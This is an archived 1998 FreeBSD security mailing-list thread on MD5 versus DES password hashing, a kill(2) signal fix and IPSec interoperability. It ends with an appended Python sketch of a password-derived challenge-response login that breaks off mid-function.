Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 12:57:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA24625 for freebsd-security-outgoing; Fri, 29 May 1998 12:57:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from alpha.sea-to-sky.net (sreid@sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA24577 for ; Fri, 29 May 1998 12:57:08 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net) Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.8.7/8.8.7) id NAA09649; Fri, 29 May 1998 13:04:56 -0700 Date: Fri, 29 May 1998 13:04:56 -0700 (PDT) From: Steve Reid To: Open Systems Networking cc: Cory Kempf , freebsd-security@FreeBSD.ORG Subject: Re: MD5 v. DES? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Is there a discussion somewhere about the merits of MD5 v. DES? > > E.g. what advantages one has over the other? > > If I recall from past memories MD5 i believe is faster. The MD5 password hashing scheme in FreeBSD is slower than the traditional DES hashing. Both schemes, when they were designed, were deliberately made slow to make programs like "crack" slower. DES was extended to 25 rounds instead of the usual 16, and MD5 runs hundreds(?) of iterations of the hash function. The DES scheme was designed for a time when processors were not as fast as they are now, and so "crack" is very efficient when attacking DES-based password files. The MD5-based crypt is much slower, so "crack" takes considerably longer to run. 
Using MD5 instead of DES will use more of your CPU cycles, but the crackers feel it _much_ more because they have to run crypt constantly until the crack run is completed, instead of just running a crypt once at login. MD5 also has the benefit of being exportable, whereas DES is subject to restrictions in many countries because it was designed for encryption. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 13:34:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA03731 for freebsd-security-outgoing; Fri, 29 May 1998 13:34:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA03490; Fri, 29 May 1998 13:33:06 -0700 (PDT) (envelope-from cschuber@passer.osg.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.0/8.6.10) id NAA18667; Fri, 29 May 1998 13:31:53 -0700 (PDT) Message-Id: <199805292031.NAA18667@passer.osg.gov.bc.ca> Received: from localhost(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost, id smtpdaasgEa; Fri May 29 13:31:50 1998 Reply-to: Cy Schubert - ITSD Open Systems Group X-Mailer: MH To: freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Kill(2) Vulnerability Date: Fri, 29 May 1998 13:30:58 -0700 From: Cy Schubert - ITSD Open Systems Group Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One of my co-workers brought this to my attention from http://www.openbsd.org/errata.html#kill. SECURITY FIX The kill(2) system call previously would permit a large set of signals to be delivered to setuid or setgid processes. If such processes were using those signals in dubious ways, this could have resulted in security problems of various kinds. 
The second revision of a source code patch which solves the problem is available. I haven't seen this discussed on FreeBSD-Security yet. I've looked at the CVS log for kern_sig.c, however I cannot see any fix in there for it. Has this been fixed somewhere else? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 14:12:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA03589 for freebsd-security-outgoing; Fri, 29 May 1998 14:12:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA03518 for ; Fri, 29 May 1998 14:12:08 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id RAA14378 for ; Fri, 29 May 1998 17:11:37 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id RAA23363 for ; Fri, 29 May 1998 17:11:38 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id RAA14302; Fri, 29 May 1998 17:11:37 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Fri, 29 May 1998 17:11:37 -0400 (EDT) Message-Id: <199805292111.RAA14302@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. 
Woods) To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-Reply-To: Philippe Regnauld's message of "Fri, May 29, 1998 17:39:09 +0200" regarding "Re: FreeBSD Tunneling" id <19980529173909.62558@deepo.prosa.dk> References: <01bd8afd$5fdb2bc0$8a8266ce@violet.eznets.canton.oh.us> <19980529173909.62558@deepo.prosa.dk> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ On Fri, May 29, 1998 at 17:39:09 (+0200), Philippe Regnauld wrote: ] > Subject: Re: FreeBSD Tunneling > > Regarding interoperability: > > http://www.rsa.com/rsa/SWAN/swan_test.htm The most interesting and curious thing revealed to even an outsider by the interoperability reports presented on this page is that ISAKMP/Oakley just doesn't seem to interoperate. (Although I'm sure it must be a mistake the table even claims that major ISAKMP products don't interoperate with each other....) Given what I've seen of the complexity, I've no doubt why early implementations don't interoperate either. SKIP, on the other hand, is apparently widely available, and reasonably widely interoperable. There are at least two or three SKIP implementations not mentioned in the table that I know interoperate with at least Sun's PC SKIP client, and of course with themselves. One thing I have learned about IPSec in my recent wanderings is that I've never seen anything so error prone to create and manage and as difficult to prove correct as "security associations". What a brain-dead concept. At any significant degree of complexity you'd have to live with a network sniffer plugged into your brain for weeks before you could give any reasonable degree of assurance that your network was still safe and secure. Is anyone out there writing tools (eg. filters for NFR) that will prove that a given VPN configuration is what it is supposed to be? -- Greg A. 
Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 16:12:23 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA26690 for freebsd-security-outgoing; Fri, 29 May 1998 16:12:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA26674 for ; Fri, 29 May 1998 16:12:02 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu) Received: from dsl.cis.upenn.edu (H-135-207-24-124.research.att.com [135.207.24.124]) by adk.gr (8.8.8/8.8.5) with ESMTP id TAA24031 for ; Fri, 29 May 1998 19:11:25 -0400 (EDT) Message-Id: <199805292311.TAA24031@adk.gr> To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling Date: Fri, 29 May 1998 19:06:09 EDT From: "Angelos D. Keromytis" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To: freebsd-security@freebsd.org Subject: Re: FreeBSD Tunneling Cc: Date: 05/29/98, 19:06:07 Actually, almost all vendors interoperate with each other these days. You should be looking at either the ANX or the NIST interop results, which are more recent.
-Angelos To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 17:09:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA05853 for freebsd-security-outgoing; Fri, 29 May 1998 17:09:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from iq.org (proff@polysynaptic.iq.org [203.4.184.222]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id RAA05827 for ; Fri, 29 May 1998 17:08:55 -0700 (PDT) (envelope-from proff@iq.org) Received: (qmail 674 invoked by uid 110); 30 May 1998 00:08:42 -0000 To: Cy Schubert - ITSD Open Systems Group Cc: freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: Kill(2) Vulnerability References: <199805292031.NAA18667@passer.osg.gov.bc.ca> From: Julian Assange Date: 30 May 1998 10:08:41 +1000 In-Reply-To: Cy Schubert - ITSD Open Systems Group's message of "Fri, 29 May 1998 13:30:58 -0700" Message-ID: Lines: 21 X-Mailer: Gnus v5.5/XEmacs 20.4 - "Emerald" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Cy Schubert - ITSD Open Systems Group writes: > One of my co-workers brought this to my attention from > http://www.openbsd.org/errata.html#kill. > > SECURITY FIX > The kill(2) system call previously would permit a large set > of signals to be delivered to setuid or setgid processes. If such > processes were using those signals in dubious ways, this could > have resulted in security problems of various kinds.
The second > revision of a source code patch which solves the problem is > available. It's perfectly reasonable for kill(2) to deliver A Large Set Of Signals to s[gu]id programs running under the same process group. The issue here is that it's possible to send signals that the code has trapped internally (like SIGALRM). This is a userland issue in my opinion. Either pull out of the process group, or deal with the signals concerned. Cheers, Julian. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 17:51:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA14248 for freebsd-security-outgoing; Fri, 29 May 1998 17:51:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c243.moon.jic.com [206.156.18.253]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA14225 for ; Fri, 29 May 1998 17:50:48 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id UAA19907; Fri, 29 May 1998 20:50:11 -0400 (EDT) (envelope-from gjp@gjp.erols.com) To: Open Systems Networking cc: Cory Kempf , freebsd-security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: MD5 v. DES? In-reply-to: Your message of "Fri, 29 May 1998 12:49:35 EDT." Date: Fri, 29 May 1998 20:50:11 -0400 Message-ID: <19903.896489411@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Open Systems Networking wrote in message ID : > > Is there a discussion somewhere about the merits of MD5 v. DES? > > E.g. what advantages one has over the other? > > If I recall from past memories MD5 I believe is faster. Actually, from what I remember, the MD5 password crypt() routine is slower than DES and also keeps more significant characters, allowing longer and more difficult to crack passwords.
Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 18:34:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA20886 for freebsd-security-outgoing; Fri, 29 May 1998 18:34:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from panda.hilink.com.au (panda.hilink.com.au [203.8.15.25]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA20851 for ; Fri, 29 May 1998 18:34:13 -0700 (PDT) (envelope-from danny@panda.hilink.com.au) Received: (from danny@localhost) by panda.hilink.com.au (8.8.5/8.8.5) id LAA28999; Sat, 30 May 1998 11:33:50 +1000 (EST) Date: Sat, 30 May 1998 11:33:49 +1000 (EST) From: "Daniel O'Callaghan" To: Steve Reid cc: freebsd-security@FreeBSD.ORG Subject: Re: MD5 v. DES? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 29 May 1998, Steve Reid wrote: > MD5 also has the benefit of being exportable, whereas DES is subject to > restrictions in many countries because it was designed for encryption. In source code, yes. It is, in fact, legal to export programs and .o files which perform a DES-based hashing such as the standard Unix password scheme. Hence, if you buy a commercial Unix OS outside the USA, you get DES style passwords, but you can't get the source, and the vendor leaves out the programs which do data-privacy encryption. The reason that hashing is exportable is that it is only useful for identification and integrity, not privacy. MD5 is a hashing-only algorithm, and so can be freely exported from the USA. DES-hashing source can't be exported because it is trivial to turn it into DES-privacy code. 
Danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 19:38:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA29518 for freebsd-security-outgoing; Fri, 29 May 1998 19:38:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from wumpus.its.uow.edu.au (wumpus.its.uow.edu.au [130.130.68.12]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA29509 for ; Fri, 29 May 1998 19:38:02 -0700 (PDT) (envelope-from ncb05@uow.edu.au) Received: from banshee.cs.uow.edu.au (ncb05@banshee.cs.uow.edu.au [130.130.188.1]) by wumpus.its.uow.edu.au (8.9.0.Beta5/8.9.0.Beta5) with SMTP id MAA03167; Sat, 30 May 1998 12:37:51 +1000 (EST) Date: Sat, 30 May 1998 12:37:50 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: Jason Hudgins cc: freebsd-security@FreeBSD.ORG Subject: Re: MD5 v. DES? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 29 May 1998, Jason Hudgins wrote: > > redirected to -security > > > > > Is there a discussion somewhere about the merits of MD5 v. DES? > > > E.g. what advantages one has over the other? > > > > If I recall from past memories MD5 I believe is faster. > > Which in my opinion, is not necessarily a good thing. It also depends on what exactly you are discussing. MD5 is a one-way hash algorithm, whereas DES is an encryption algorithm with several different modes used for encryption (ecb, cbc, 3des, etc). Also, with regards to speed, if you're concerned primarily with system security, and don't require hundreds or more authentications per second (ecommerce perhaps), you should probably go for something that takes a bit longer to generate a key. This will slow down brute-force key search attacks.
An example of this would be hashing a given string "x" times before sending it to crypt(3). Along parallel lines, is anyone working on patching /usr/bin/passwd to be proactive in rejecting bad passwords instead of simply "suggesting" that the supplied string is too short/weak/lowercase/etc? It is trivial to patch the code to do so but it'd be nice if it happened by default. :) > Jason Hudgins > http://www.incantations.net/~thanatos Nick -- Email: ncb05@uow.edu.au - DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A http://rabble.uow.edu.au/~nick - public key available on request. Nicholas Brawn - Computer Science Undergraduate, University of Wollongong. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 23:45:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA02614 for freebsd-security-outgoing; Fri, 29 May 1998 23:45:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dc1.mfn.org (dc1.mfn.org [204.238.179.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id XAA02447; Fri, 29 May 1998 23:44:36 -0700 (PDT) (envelope-from sysadmin@mfn.org) Received: from w3svcs.mfn.org (unverified [204.238.179.11]) by mail.mfn.org (EMWAC SMTPRS 0.83) with SMTP id ; Sat, 30 May 1998 01:46:45 -0500 Received: by w3svcs.mfn.org with Microsoft Mail id <01BD8B6C.68192890@w3svcs.mfn.org>; Sat, 30 May 1998 01:43:55 -0500 Message-ID: <01BD8B6C.68192890@w3svcs.mfn.org> From: "J.A. Terranson" To: "'Gary Palmer'" , Open Systems Networking Cc: Cory Kempf , "freebsd-security@FreeBSD.ORG" Subject: RE: MD5 v. DES? Date: Sat, 30 May 1998 01:43:54 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Actually, this question is nonsensical, as MD5 and DES are two *entirely* different things. MD5 (Message Digest [algorithm] 5) is a *hash* function: It does *NOT* encrypt! 
What it does is provide a "one way" pseudo-signature based on the contents of the file it is run against. What makes this a "one way" function is that you can get a hash (signature) from a file, but you *cannot* get a file from a hash! DES (Data Encryption Standard [modified LUCIFER]) is a two-way *encryption* function. Not only can you reduce a file to an indecipherable mess, but you can take the mess, and recover the original file. Unfortunately, comparing MD5 and DES is an "apples and oranges" proposition... J.A. Terranson sysadmin@mfn.org > > Is there a discussion somewhere about the merits of MD5 v. DES? > > E.g. what advantages one has over the other? > > If I recall from past memories MD5 I believe is faster. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 29 23:53:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA03914 for freebsd-security-outgoing; Fri, 29 May 1998 23:53:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c243.moon.jic.com [206.156.18.253]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA03902 for ; Fri, 29 May 1998 23:53:45 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id CAA20838; Sat, 30 May 1998 02:52:25 -0400 (EDT) (envelope-from gjp@gjp.erols.com) To: "J.A. Terranson" cc: Open Systems Networking , Cory Kempf , "freebsd-security@FreeBSD.ORG" From: "Gary Palmer" Subject: Re: MD5 v. DES? In-reply-to: Your message of "Sat, 30 May 1998 01:43:54 CDT." <01BD8B6C.68192890@w3svcs.mfn.org> Date: Sat, 30 May 1998 02:52:25 -0400 Message-ID: <20834.896511145@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "J.A.
Terranson" wrote in message ID <01BD8B6C.68192890@w3svcs.mfn.org>: > > Actually, this question is nonsensical, as MD5 and DES are > two *entirely* different things. Err, actually I think you are missing some context. FreeBSD can use either MD5 or DES passwords. Why? Well, since the way crypt() is used to check passwords is to re-encrypt a supplied password and then checking it against the one in the password database, you *can* use a one way hash like MD5 as a password ``crypt'' since you are only ever encrypting. It also gets around a very tricky situation in the US where you cannot export crypto code. However, you can export hashing functions ... So, in general, you are right. However, in this case I believe we are talking about password functions, and there *is* a relevance to the comparison. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 03:58:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA29124 for freebsd-security-outgoing; Sat, 30 May 1998 03:58:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA29114; Sat, 30 May 1998 03:58:37 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199805301058.DAA29114@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA219545902; Sat, 30 May 1998 20:58:22 +1000 From: Darren Reed Subject: Re: MD5 v. DES? To: sysadmin@mfn.org (J.A. Terranson) Date: Sat, 30 May 1998 20:58:21 +1000 (EST) Cc: gpalmer@FreeBSD.ORG, opsys@mail.webspan.net, ckempf@enigami.com, freebsd-security@FreeBSD.ORG In-Reply-To: <01BD8B6C.68192890@w3svcs.mfn.org> from "J.A. 
Terranson" at May 30, 98 01:43:54 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from J.A. Terranson, sie said: > > > Actually, this question is nonsensical, as MD5 and DES are > two *entirely* different things. > > MD5 (Message Digest [algorithm] 5) is a *hash* function: It > does *NOT* encrypt! What it does is provide a "one way" > pseudo-signature based on the contents of the file it is run > against. What makes this a "one way" function is that you can > get a hash (signature) from a file, but you *cannot* get a file > from a hash! > > DES (Data Encryption Standard [modified LUCIFER]) is a two-way > *encryption* function. Not only can you reduce a file to an > indecipherable mess, but you can take the mess, and recover > the original file. Isn't MD-5 also classed as a cryptographic checksum or is that just limited to SHA-1 and RIPE-MD ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 09:50:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA29802 for freebsd-security-outgoing; Sat, 30 May 1998 09:50:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dc1.mfn.org (dc1.mfn.org [204.238.179.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA29664; Sat, 30 May 1998 09:49:28 -0700 (PDT) (envelope-from sysadmin@mfn.org) Received: from w3svcs.mfn.org (unverified [204.238.179.11]) by mail.mfn.org (EMWAC SMTPRS 0.83) with SMTP id ; Sat, 30 May 1998 11:50:02 -0500 Received: by w3svcs.mfn.org with Microsoft Mail id <01BD8BC0.AC500930@w3svcs.mfn.org>; Sat, 30 May 1998 11:47:07 -0500 Message-ID: <01BD8BC0.AC500930@w3svcs.mfn.org> From: "J.A. Terranson" To: "'Darren Reed'" Cc: "gpalmer@FreeBSD.ORG" , "opsys@mail.webspan.net" , "ckempf@enigami.com" , "freebsd-security@FreeBSD.ORG" Subject: RE: MD5 v.
DES? Date: Sat, 30 May 1998 11:47:05 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [=] I *believe* it is, and it is *definitely* used as such, but I couldn't commit to this answer without checking... J.A. Terranson sysadmin@mfn.org Isn't MD-5 also classed as a cryptographic checksum or is that just limited to SHA-1 and RIPE-MD ? Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 10:09:22 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA02592 for freebsd-security-outgoing; Sat, 30 May 1998 10:09:22 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dc1.mfn.org (dc1.mfn.org [204.238.179.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id KAA02514; Sat, 30 May 1998 10:08:54 -0700 (PDT) (envelope-from sysadmin@mfn.org) Received: from w3svcs.mfn.org (unverified [204.238.179.11]) by mail.mfn.org (EMWAC SMTPRS 0.83) with SMTP id ; Sat, 30 May 1998 12:10:54 -0500 Received: by w3svcs.mfn.org with Microsoft Mail id <01BD8BC3.962CBD80@w3svcs.mfn.org>; Sat, 30 May 1998 12:07:59 -0500 Message-ID: <01BD8BC3.962CBD80@w3svcs.mfn.org> From: "J.A. Terranson" To: "'Gary Palmer'" Cc: Open Systems Networking , Cory Kempf , "freebsd-security@FreeBSD.ORG" Subject: RE: MD5 v. DES? Date: Sat, 30 May 1998 12:07:57 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "J.A. Terranson" wrote in message ID <01BD8B6C.68192890@w3svcs.mfn.org>: > > Actually, this question is nonsensical, as MD5 and DES are > two *entirely* different things. So, in general, you are right. However, in this case I believe we are talking about password functions, and there *is* a relevance to the comparison. [=] I was not aware of the context (I was responding to "digested" 8-> form of the original message (having never seen the original) which did not make the context clear... 
Within this context, I would submit that DES is the "better" function, as it is not subject to "birthday" problems, I do realize however, in the *real* world, this is probably not a *real* issue... J.A. Terranson sysadmin@mfn.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 30 11:33:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA13077 for freebsd-security-outgoing; Sat, 30 May 1998 11:33:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns1.yes.no (ns1.yes.no [195.119.24.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA13007 for ; Sat, 30 May 1998 11:32:27 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.8.7/8.8.7) with ESMTP id SAA10540; Sat, 30 May 1998 18:32:25 GMT Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id UAA05785; Sat, 30 May 1998 20:32:04 +0200 (MET DST) Message-ID: <19980530203204.34537@follo.net> Date: Sat, 30 May 1998 20:32:04 +0200 From: Eivind Eklund To: "J.A. Terranson" Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: MD5 v. DES? References: <01BD8BC3.962CBD80@w3svcs.mfn.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.89.1i In-Reply-To: <01BD8BC3.962CBD80@w3svcs.mfn.org>; from J.A. Terranson on Sat, May 30, 1998 at 12:07:57PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 30, 1998 at 12:07:57PM -0500, J.A. Terranson wrote: > [=] I was not aware of the context (I was responding to > "digested" 8-> form of the original message (having never > seen the original) which did not make the context clear... 
> > Within this context, I would submit that DES is the "better" > function, as it is not subject to "birthday" problems, I do realize > however, in the *real* world, this is probably not a *real* issue... I think you've misunderstood much of the basis here. (1) EVERY hash function is subject to 'birthday' attacks. All of them. It is _not_ possible to avoid. The question (if the hash is cryptographically secure) is only one of key length. (2) "Birthday" attacks are a real issue. They mean that hash-length is effectively severely reduced for proving ID of a certain document. (3) They're absolutely not relevant for the present context, which is one of password hashing. Passwords are supposed to go through a good, parameterized one-way hash. The 'birthday' attack could be used to create a password entry that could be used with two different passwords. This is not a security problem. Apart from that, my ideal hash for a password file is one based on searching for public keys. It'd go like this: (1) Salt the password (2) Use a cheap one-way hash to create a start value for a pseudo-random function (e.g, an LFSR) (3) Use the random-function to do a deterministic search for a public/private key pair (4) Store the salt and the public part of the key as the hash The advantage of this is that the stored password hash can be used to do challenges against. We can determine that a client has the password by sending a challenge consisting of some random data and the salt. The client runs through steps 1 through 3 above, and then uses the private key to sign the data and returns that to the server. Voila - we've proved that the client has the password, without revealing anything to the server (or any listeners). Much better than shared secrets. Eivind.
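Added example (not part of the post above and not FreeBSD code): the password-derived key pair and challenge-response login from steps (1) to (4), with both sides' messages. It swaps the cheap hash and LFSR key search for PBKDF2 producing a Schnorr private exponent in the RFC 3526 2048-bit MODP group; the function names, record layout and iteration count are assumptions.

```python
"""Password-derived key pair with challenge-response login (illustrative sketch)."""
import hashlib
import hmac
import secrets

# RFC 3526 group 14: 2048-bit safe prime P; 2 generates the subgroup of order Q.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D"
    "C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F"
    "83655D23DCA3AD961C62F356208552BB9ED529077096966D"
    "670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
    "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9"
    "DE2BCBF6955817183995497CEA956AE515D2261898FA0510"
    "15728E5A8AACAA68FFFFFFFFFFFFFFFF",
    16,
)
Q = (P - 1) // 2
G = 2
KDF_ROUNDS = 100_000  # assumption: tune so one derivation costs a noticeable delay


def derive_private_key(password: str, salt: bytes) -> int:
    """Steps 1-3: salt the password and stretch it into a private exponent.

    PBKDF2 stands in for the post's cheap hash + LFSR search; it is kept
    slow because the stored public key lets anyone holding it test guesses.
    """
    raw = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ROUNDS)
    return int.from_bytes(raw, "big") % (Q - 1) + 1


def enroll(password: str) -> dict:
    """Step 4: the password-file record holds only the salt and public key."""
    salt = secrets.token_bytes(16)
    return {"salt": salt, "public": pow(G, derive_private_key(password, salt), P)}


def _bind(commitment: int, public: int, nonce: bytes) -> int:
    """Hash the commitment, public key and server nonce into a 256-bit value."""
    data = commitment.to_bytes(256, "big") + public.to_bytes(256, "big") + nonce
    return int.from_bytes(hashlib.sha256(data).digest(), "big")


def server_challenge(record: dict) -> dict:
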